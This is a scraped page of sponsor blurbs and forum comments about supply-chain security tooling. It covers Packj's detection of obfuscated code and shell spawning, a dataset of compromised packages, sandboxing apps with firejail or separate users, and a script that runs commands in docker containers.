Our great sponsors
-
packj
Packj stops :zap: Solarwinds-, ESLint-, and PyTorch-like attacks by flagging malicious/vulnerable open-source dependencies ("weak links") in your software supply-chain
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
-
software-supply-chain-compromises
Discontinued A dataset of software supply chain compromises. Please help us maintain it!
> a base 64 encrypted string that gets decrypted and then passed to a shell.
This is a very common malicious behavior. Packj detects obfuscation [1] as well as spawning of shell commands (exec system call) [2]. I've updated threats.csv to flag code obfuscation.
1. https://github.com/ossillate-inc/packj/blob/main/main.py#L48...
> I like Android's system of per-app uid/gid. But AFAIK it's not implemented by any mainstream Linux kernel or distro.
You can create users manually for each app.
For GUI apps, https://firejail.wordpress.com/
Sure. Please email me (in profile) for the list. You can also look at the following resources for malware samples:
1. https://github.com/IQTLabs/software-supply-chain-compromises
I hacked up a bash script for running arbitrary command in docker container, mounting only PWD. It traces dynamic libraries through ldd and creates a new image for each unique command. I got it working for ffmpeg:
https://github.com/paskozdilar/dockerify
I might try to optimize it a little bit later, perhaps bind-mount dynamic libraries instead of creating a new image for each command.